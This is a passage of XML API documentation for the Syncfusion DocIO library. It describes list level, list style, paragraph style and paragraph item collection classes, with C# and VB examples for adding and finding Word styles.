            <seealso cref="T:Syncfusion.DocIO.DLS.ListStyle"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListLevelCollection.#ctor(Syncfusion.DocIO.DLS.ListStyle)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.ListLevelCollection"/> class.
            </summary>
            <param name="owner">The owner.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListLevelCollection.Add(Syncfusion.DocIO.DLS.WListLevel)">
            <summary>
            Adds List level to collection.
            </summary>
            <param name="level">The level.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListLevelCollection.IndexOf(Syncfusion.DocIO.DLS.WListLevel)">
            <summary>
            Gets index of <see cref="T:Syncfusion.DocIO.DLS.WListLevel"/> in the collection.
            </summary>
            <param name="level">The level.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListLevelCollection.Clear">
            <summary>
            Removes all levels. 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListLevelCollection.CreateItem(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Creates a new item.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> object.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.OwnerHolder"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListLevelCollection.GetTagItemName">
            <summary>
            Returns the name of xml tag.
            <exclude/>
            </summary>
            <returns>The <b>string</b> that represents the tag name.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListLevelCollection.Compare(Syncfusion.DocIO.DLS.ListLevelCollection)">
            <summary>
            Compares list levels with current list levels.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ListLevelCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.WListLevel"/> at the specified index. Read-only.
            </summary>
            <param name="index">The zero-based index of the list level to get.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WListLevel"/> at the specified index.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ListOverrideLevelCollection">
            <summary>
            Represents the list levels of ListOverrideStyle.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideLevelCollection.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.ListOverrideLevelCollection"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideLevelCollection.Add(System.Int32,Syncfusion.DocIO.DLS.OverrideLevelFormat)">
            <summary>
            Adds List level into collection. 
            </summary>
            <param name="lfoLevel"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideLevelCollection.GetLevelNumber(Syncfusion.DocIO.DLS.OverrideLevelFormat)">
            <summary>
            Gets the level number.
            </summary>
            <param name="levelFormat">The level format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideLevelCollection.HasOverrideLevel(System.Int32)">
            <summary>
            Determines whether the current list override style has specified level.
            </summary>
            <param name="levelNumber">The level number.</param>
            <returns>
            	<c>true</c> if the current list override style has specified level; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideLevelCollection.CloneToImpl(Syncfusion.DocIO.DLS.CollectionImpl)">
            <summary>
            Clones itself.
            </summary>
            <param name="collection">The collection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideLevelCollection.CreateItem(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideLevelCollection.GetTagItemName">
            <summary>
            Gets name of xml tag
            </summary>
            <value></value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideLevelCollection.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideLevelCollection.Compare(Syncfusion.DocIO.DLS.ListOverrideLevelCollection)">
            <summary>
            Compares the list override level formats with the current list override level formats
            </summary>
            <param name="listOverrideLevels">The list override levels</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ListOverrideLevelCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.OverrideLevelFormat"/> at the specified index.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ListOverrideLevelCollection.OwnerStyle">
            <summary>
            Gets the owner style.
            </summary>
            <value>The owner style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ListOverrideLevelCollection.LevelIndex">
            <summary>
            Gets or sets the level index.
            </summary>
            <value>The .</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ListOverrideStyleCollection">
            <summary>
            Summary description for ListOverridesCollection.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.StyleCollection">
            <summary>
            Represents a collection of <see cref="T:Syncfusion.DocIO.DLS.Style"/> objects.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IStyleCollection">
            <summary>
            Represents a collection of <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> objects.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IStyleCollection.Add(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Adds the specified <see cref="T:Syncfusion.DocIO.DLS.Style"/> to collection. 
            </summary>
            <param name="style">The <see cref="T:Syncfusion.DocIO.DLS.Style"/> to be added to the styles collection.</param>
            <returns>The zero-based index of the added <see cref="T:Syncfusion.DocIO.DLS.Style"/>.</returns>
            <example>
            <para>The following code example demonstrates how to add style to the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open an input Word template
                WordDocument document = new WordDocument(inputFileName);
                //Access the styles collection which contains paragraph and character styles in Word document
                WParagraphStyle style = new WParagraphStyle(document);
                //Specify the style name.
                style.Name = "User_Defined_style";
                //Specify the character properties for the style
                style.CharacterFormat.Bold = true;
                style.CharacterFormat.FontName = "Arial";
                style.CharacterFormat.FontSize = 14;
                //Specify the paragraph properties for the style
                style.ParagraphFormat.BackColor = Color.LightGray;
                style.ParagraphFormat.AfterSpacing = 18f;
                style.ParagraphFormat.BeforeSpacing = 18f;
                StyleCollection styleCollection = document.Styles as StyleCollection;
                //Add the style to the document styles collection.
                styleCollection.Add(style);
                //Save and close the document
                document.Save(outputFileName, FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open an input Word template
                Dim document As New WordDocument(inputFileName)
                'Access the styles collection which contains paragraph and character styles in Word document
                Dim style As New WParagraphStyle(document)
                'Specify the style name.
                style.Name = "User_Defined_style"
                'Specify the character properties for the style
                style.CharacterFormat.Bold = True
                style.CharacterFormat.FontName = "Arial"
                style.CharacterFormat.FontSize = 14
                'Specify the paragraph properties for the style
                style.ParagraphFormat.BackColor = Color.LightGray
                style.ParagraphFormat.AfterSpacing = 18F
                style.ParagraphFormat.BeforeSpacing = 18F
                Dim styleCollection As StyleCollection = TryCast(document.Styles, StyleCollection)
                'Add the style to the document styles collection.
                styleCollection.Add(style)
                'Save and close the document
                document.Save(outputFileName, FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IStyleCollection.FindByName(System.String)">
            <summary>
            Finds a first style in the collection with specified style name.
            </summary>
            <param name="name">The <b>string</b> value that represents the name of the style to be found.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> object of specified name</returns>
            <exception cref="T:System.ArgumentNullException">The style name is not valid in the <see cref="T:Syncfusion.DocIO.DLS.StyleCollection"/></exception>
            <example> The following example illustrates how to find a style by its name and modify its character and paragraph formats.
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open an input Word template
                WordDocument document = new WordDocument(inputFileName);
                //Access the styles collection which contains paragraph and character styles in Word document
                IStyleCollection styleCollection = document.Styles;
                //Find the style with the name "Heading 1"
                WParagraphStyle heading1ParagraphStyle = styleCollection.FindByName("Heading 1") as WParagraphStyle;
                //Change the text color of style "Heading 1" as DarkBlue
                heading1ParagraphStyle.CharacterFormat.TextColor = Color.DarkBlue;
                //Change the first line indent of Paragraph as 36 points
                heading1ParagraphStyle.ParagraphFormat.FirstLineIndent = 36;
                document.Save(outputFileName, FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open an input Word template
                Dim document As New WordDocument(inputFileName)
                'Access the styles collection which contains paragraph and character styles in Word document
                Dim styleCollection As IStyleCollection = document.Styles
                'Find the style with the name "Heading 1"
                Dim heading1ParagraphStyle As WParagraphStyle = TryCast(styleCollection.FindByName("Heading 1"), WParagraphStyle)
                'Change the text color of style "Heading 1" as DarkBlue
                heading1ParagraphStyle.CharacterFormat.TextColor = Color.DarkBlue
                'Change the first line indent of paragraph as 36 points
                heading1ParagraphStyle.ParagraphFormat.FirstLineIndent = 36
                document.Save(outputFileName, FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IStyleCollection.FindByName(System.String,Syncfusion.DocIO.DLS.StyleType)">
            <summary>
            Finds a style in the collection specified by the style name and style type.
            </summary>
            <param name="name">The <b>string</b> value that represents the name of the style to be found.</param>
            <param name="styleType">The <see cref="T:Syncfusion.DocIO.DLS.StyleType"/> of the specified style.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> object with the specified name.</returns>        
            <exception cref="T:System.ArgumentNullException">The style name is not valid in the <see cref="T:Syncfusion.DocIO.DLS.StyleCollection"/></exception> 
            <example>The following example illustrates how to find a style by its name and its type.
            <code lang="VB">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open an input Word template
                WordDocument document = new WordDocument(inputFileName);
                //Access the styles collection which contains paragraph and character styles in Word document
                IStyleCollection styleCollection = document.Styles;
                //Find the style with the name "Heading 1"
                WParagraphStyle heading1ParagraphStyle = styleCollection.FindByName("Heading 1", StyleType.ParagraphStyle) as WParagraphStyle;
                //Change the text color of style "Heading 1" as DarkBlue
                heading1ParagraphStyle.CharacterFormat.TextColor = Color.DarkBlue;
                //Change the first line indent of Paragraph as 36 points
                heading1ParagraphStyle.ParagraphFormat.FirstLineIndent = 36;
                document.Save(outputFileName, FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open an input Word template
                Dim document As New WordDocument(inputFileName)
                'Access the styles collection which contains paragraph and character styles in Word document
                Dim styleCollection As IStyleCollection = document.Styles
                'Find the style with the name "Heading 1"
                Dim heading1ParagraphStyle As WParagraphStyle = TryCast(styleCollection.FindByName("Heading 1", StyleType.ParagraphStyle), WParagraphStyle)
                'Change the text color of style "Heading 1" as DarkBlue
                heading1ParagraphStyle.CharacterFormat.TextColor = Color.DarkBlue
                'Change the first line indent of Paragraph as 36 points
                heading1ParagraphStyle.ParagraphFormat.FirstLineIndent = 36
                document.Save(outputFileName, FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IStyleCollection.FindById(System.Int32)">
            <summary>
            Finds a style specified by its style Id.
            </summary>
            <param name="styleId">The <b>integer</b> that represents the Id of the style.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> object of specified Id</returns>
            <exception cref="T:System.ArgumentNullException">The style Id is not valid in the <see cref="T:Syncfusion.DocIO.DLS.StyleCollection"/></exception> 
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IStyleCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.Style"/> at the specified index.
            </summary>
            <param name="index">The zero-based index of the style to get</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Style"/> at the specified index</value>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid index in the <see cref="T:Syncfusion.DocIO.DLS.StyleCollection"/></exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IStyleCollection.FixedIndex13HasStyle">
            <summary>
             Gets or sets a value indicating whether the stylesheet has style at 13th index
            </summary>
            <value><b>True</b>, if the stylesheet has style at 13th index(other than empty style), otherwise <b>false</b></value>
            <remarks>Reserved styles are applicable only for *.doc format</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IStyleCollection.FixedIndex14HasStyle">
            <summary>
            Gets or sets a value indicating whether the stylesheet has style at 14th index
            </summary>
            <value><b>True</b>, if the stylesheet has style at 14th index(other than empty style), otherwise <b>false</b></value>
            <remarks>Reserved styles are applicable only for *.doc format</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IStyleCollection.FixedIndex13StyleName">
            <summary>
            Gets or sets the name of the style at 13th index in the stylesheet
            </summary>
            <value>The <b>string</b> that represents the name of the style.</value>
            <remarks>Reserved styles are applicable only for *.doc format</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IStyleCollection.FixedIndex14StyleName">
            <summary>
            Gets or sets the name of the style at 14th index in the stylesheet
            </summary>
            <value>The <b>string</b> that represents the name of the style.</value>        
            <remarks>Reserved styles are applicable only for *.doc format</remarks>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.StyleCollection.m_FixedIndex13StyleName">
            <summary>
            Represents the style name of the style present at the fixed index 13 in the stylesheet
            </summary>
            <remarks>Reserved styles are applicable only for *.doc format</remarks>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.StyleCollection.m_FixedIndex14StyleName">
            <summary>
            Represents the style name of the style present at the fixed index 14 in the stylesheet
            </summary>
            <remarks>Reserved styles are applicable only for *.doc format</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StyleCollection.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.StyleCollection"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StyleCollection.Add(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Adds the specified <see cref="T:Syncfusion.DocIO.DLS.Style"/> to collection. 
            </summary>
            <param name="style">The <see cref="T:Syncfusion.DocIO.DLS.Style"/> to be added to the styles collection.</param>
            <returns>The zero-based index of the added <see cref="T:Syncfusion.DocIO.DLS.Style"/>.</returns>
            <example>
            <para>The following code example demonstrates how to add style to the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open an input Word template
                WordDocument document = new WordDocument(inputFileName);
                //Access the styles collection which contains paragraph and character styles in Word document
                WParagraphStyle style = new WParagraphStyle(document);
                //Specify the style name.
                style.Name = "User_Defined_style";
                //Specify the character properties for the style
                style.CharacterFormat.Bold = true;
                style.CharacterFormat.FontName = "Arial";
                style.CharacterFormat.FontSize = 14;
                //Specify the paragraph properties for the style
                style.ParagraphFormat.BackColor = Color.LightGray;
                style.ParagraphFormat.AfterSpacing = 18f;
                style.ParagraphFormat.BeforeSpacing = 18f;
                StyleCollection styleCollection = document.Styles as StyleCollection;
                //Add the style to the document styles collection.
                styleCollection.Add(style);
                //Save and close the document
                document.Save(outputFileName, FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open an input Word template
                Dim document As New WordDocument(inputFileName)
                'Access the styles collection which contains paragraph and character styles in Word document
                Dim style As New WParagraphStyle(document)
                'Specify the style name.
                style.Name = "User_Defined_style"
                'Specify the character properties for the style
                style.CharacterFormat.Bold = True
                style.CharacterFormat.FontName = "Arial"
                style.CharacterFormat.FontSize = 14
                'Specify the paragraph properties for the style
                style.ParagraphFormat.BackColor = Color.LightGray
                style.ParagraphFormat.AfterSpacing = 18F
                style.ParagraphFormat.BeforeSpacing = 18F
                Dim styleCollection As StyleCollection = TryCast(document.Styles, StyleCollection)
                'Add the style to the document styles collection.
                styleCollection.Add(style)
                'Save and close the document
                document.Save(outputFileName, FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StyleCollection.FindByName(System.String)">
            <summary>
            Finds a first style in the collection with specified style name.
            </summary>
            <param name="name">The <b>string</b> value that represents the name of the style to be found.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> object of specified name</returns>
            <exception cref="T:System.ArgumentNullException">The style name is not valid in the <see cref="T:Syncfusion.DocIO.DLS.StyleCollection"/></exception>
            <example> The following example illustrates how to find a style by its name and modify its character and paragraph formats.
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open an input Word template
                WordDocument document = new WordDocument(inputFileName);
                //Access the styles collection which contains paragraph and character styles in Word document
                IStyleCollection styleCollection = document.Styles;
                //Find the style with the name "Heading 1"
                WParagraphStyle heading1ParagraphStyle = styleCollection.FindByName("Heading 1") as WParagraphStyle;
                //Change the text color of style "Heading 1" as DarkBlue
                heading1ParagraphStyle.CharacterFormat.TextColor = Color.DarkBlue;
                //Change the first line indent of Paragraph as 36 points
                heading1ParagraphStyle.ParagraphFormat.FirstLineIndent = 36;
                document.Save(outputFileName, FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open an input Word template
                Dim document As New WordDocument(inputFileName)
                'Access the styles collection which contains paragraph and character styles in Word document
                Dim styleCollection As IStyleCollection = document.Styles
                'Find the style with the name "Heading 1"
                Dim heading1ParagraphStyle As WParagraphStyle = TryCast(styleCollection.FindByName("Heading 1"), WParagraphStyle)
                'Change the text color of style "Heading 1" as DarkBlue
                heading1ParagraphStyle.CharacterFormat.TextColor = Color.DarkBlue
                'Change the first line indent of paragraph as 36 points
                heading1ParagraphStyle.ParagraphFormat.FirstLineIndent = 36
                document.Save(outputFileName, FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StyleCollection.FindByName(System.String,Syncfusion.DocIO.DLS.StyleType)">
            <summary>
            Finds a style in the collection specified by the style name and style type.
            </summary>
            <param name="name">The <b>string</b> value that represents the name of the style to be found.</param>
            <param name="styleType">The <see cref="T:Syncfusion.DocIO.DLS.StyleType"/> of the specified style.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> object with the specified name.</returns>        
            <exception cref="T:System.ArgumentNullException">The style name is not valid in the <see cref="T:Syncfusion.DocIO.DLS.StyleCollection"/></exception> 
            <example>The following example illustrates how to find a style by its name and its type.
            <code lang="VB">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open an input Word template
                WordDocument document = new WordDocument(inputFileName);
                //Access the styles collection which contains paragraph and character styles in Word document
                IStyleCollection styleCollection = document.Styles;
                //Find the style with the name "Heading 1"
                WParagraphStyle heading1ParagraphStyle = styleCollection.FindByName("Heading 1", StyleType.ParagraphStyle) as WParagraphStyle;
                //Change the text color of style "Heading 1" as DarkBlue
                heading1ParagraphStyle.CharacterFormat.TextColor = Color.DarkBlue;
                //Change the first line indent of Paragraph as 36 points
                heading1ParagraphStyle.ParagraphFormat.FirstLineIndent = 36;
                document.Save(outputFileName, FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open an input Word template
                Dim document As New WordDocument(inputFileName)
                'Access the styles collection which contains paragraph and character styles in Word document
                Dim styleCollection As IStyleCollection = document.Styles
                'Find the style with the name "Heading 1"
                Dim heading1ParagraphStyle As WParagraphStyle = TryCast(styleCollection.FindByName("Heading 1", StyleType.ParagraphStyle), WParagraphStyle)
                'Change the text color of style "Heading 1" as DarkBlue
                heading1ParagraphStyle.CharacterFormat.TextColor = Color.DarkBlue
                'Change the first line indent of Paragraph as 36 points
                heading1ParagraphStyle.ParagraphFormat.FirstLineIndent = 36
                document.Save(outputFileName, FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StyleCollection.FindById(System.Int32)">
            <summary>
            Finds a style specified by its style Id.
            </summary>
            <param name="styleId">The <b>integer</b> that represents the Id of the style.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> object of specified Id</returns>
            <exception cref="T:System.ArgumentNullException">The style Id is not valid in the <see cref="T:Syncfusion.DocIO.DLS.StyleCollection"/></exception> 
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StyleCollection.CloneToImpl(Syncfusion.DocIO.DLS.CollectionImpl)">
            <summary>
            Clones to other collection.
            </summary>
            <param name="coll">The collection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StyleCollection.FindStyleByName(System.Collections.IList,System.String)">
            <summary>
            Finds the style with specified style name.
            </summary>
            <param name="styles">The styles.</param>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StyleCollection.FindStyleByName(System.Collections.IList,System.String,Syncfusion.DocIO.DLS.StyleType)">
            <summary>
            Finds the style with specified style name.
            </summary>
            <param name="styles">The styles.</param>
            <param name="name">The name.</param>
            <param name="styleType">Type of the style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StyleCollection.FindStyleById(System.Collections.IList,System.Int32)">
            <summary>
            Finds the style with specified style name.
            </summary>
            <param name="styles">The styles.</param>
            <param name="name">The name.</param>
            <param name="styleType">Type of the style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StyleCollection.CreateItem(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Creates the item.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> object.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.OwnerHolder"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.StyleCollection.GetTagItemName">
            <summary>
            Returns the name of xml tag.
            <exclude/>
            </summary>
            <returns>The <b>string</b> that specifies the tag name.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.StyleCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.Style"/> at the specified index.
            </summary>
            <param name="index">The zero-based index of the style to get</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Style"/> at the specified index</value>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid index in the <see cref="T:Syncfusion.DocIO.DLS.StyleCollection"/></exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.StyleCollection.FixedIndex13HasStyle">
            <summary>
             Gets or sets a value indicating whether the stylesheet has style at 13th index
            </summary>
            <value><b>True</b>, if the stylesheet has style at 13th index(other than empty style), otherwise <b>false</b></value>
            <remarks>Reserved styles are applicable only for *.doc format</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.StyleCollection.FixedIndex14HasStyle">
            <summary>
            Gets or sets a value indicating whether the stylesheet has style at 14th index
            </summary>
            <value><b>True</b>, if the stylesheet has style at 14th index(other than empty style), otherwise <b>false</b></value>
            <remarks>Reserved styles are applicable only for *.doc format</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.StyleCollection.FixedIndex13StyleName">
            <summary>
            Gets or sets the name of the style at 13th index in the stylesheet
            </summary>
            <value>The <b>string</b> that represents the name of the style.</value>
            <remarks>Reserved styles are applicable only for *.doc format</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.StyleCollection.FixedIndex14StyleName">
            <summary>
            Gets or sets the name of the style at 14th index in the stylesheet
            </summary>
            <value>The <b>string</b> that represents the name of the style.</value>        
            <remarks>Reserved styles are applicable only for *.doc format</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideStyleCollection.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.ListOverrideStyleCollection"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideStyleCollection.Add(Syncfusion.DocIO.DLS.ListOverrideStyle)">
            <summary>
            Adds the List Override Style to collection. 
            </summary>
            <param name="listOverrideStyle"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideStyleCollection.FindByName(System.String)">
            <summary>
            Finds Style by name 
            </summary>
            <param name="name"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideStyleCollection.CreateItem(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideStyleCollection.GetTagItemName">
            <summary>
            Gets name of xml tag
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideStyleCollection.HasEquivalentStyle(Syncfusion.DocIO.DLS.ListOverrideStyle)">
            <summary>
            Compares the current list override style with the list override style collection
            </summary>
            <param name="listOverrideStyle">The list override style to compare</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideStyleCollection.GetEquivalentStyle(Syncfusion.DocIO.DLS.ListOverrideStyle)">
            <summary>
            Gets the equivalent list override style from the list override style collection
            </summary>
            <param name="listOverrideStyle">The list override style to compare</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ListOverrideStyleCollection.Item(System.Int32)">
            <summary>
            Gets List level by index.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ListStyleCollection">
            <summary>
            Represents the collection of list styles.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyleCollection.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.ListStyleCollection"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyleCollection.Add(Syncfusion.DocIO.DLS.ListStyle)">
            <summary>
            Adds the specified list style to the collection.
            </summary>
            <param name="style">The <see cref="T:Syncfusion.DocIO.DLS.ListStyle"/> to be added to the collection.</param>
            <returns>The zero-based index of the added style.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyleCollection.FindByName(System.String)">
            <summary>
            Finds the list style with the specified name from the collection.
            </summary>
            <param name="name">The <b>string </b> that specifies the name of the list style to get from the collection.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.ListStyle"/> with the specified name.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyleCollection.CreateItem(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Creates the item.
            <exclude/>
            </summary>
            <param name="reader">The reader.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyleCollection.GetTagItemName">
            <summary>
            Gets name of xml tag
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyleCollection.HasEquivalentStyle(Syncfusion.DocIO.DLS.ListStyle)">
            <summary>
            Compares current list style with list style collection
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyleCollection.GetEquivalentStyle(Syncfusion.DocIO.DLS.ListStyle)">
            <summary>
            Gets the equivalent list style from list style collection
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ListStyleCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.ListStyle"/> at the specified index. Read-only.
            </summary>
            <param name="index">The zero-based index of the list style to get from the collection.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.ListStyle"/> at the specified index.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ParagraphItemCollection">
            <summary>
            Represents the collection of <see cref="T:Syncfusion.DocIO.DLS.ParagraphItem"/>.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItemCollection.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.ParagraphItemCollection"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItemCollection.#ctor(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.ParagraphItemCollection"/> class with
            the owner <see cref="T:Syncfusion.DocIO.DLS.WParagraph"/> instance.
            </summary>
            <param name="owner">The owner.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItemCollection.#ctor(Syncfusion.DocIO.DLS.SDTInlineContent)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.ParagraphItemCollection"/> class with
            the <see cref="T:Syncfusion.DocIO.DLS.SDTInlineContent"/> instance.
            </summary>
            <param name="owner">The owner.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItemCollection.CloneItemsTo(Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Clones the items to new collection.
            </summary>
            <param name="items">The items.</param>
        </member>
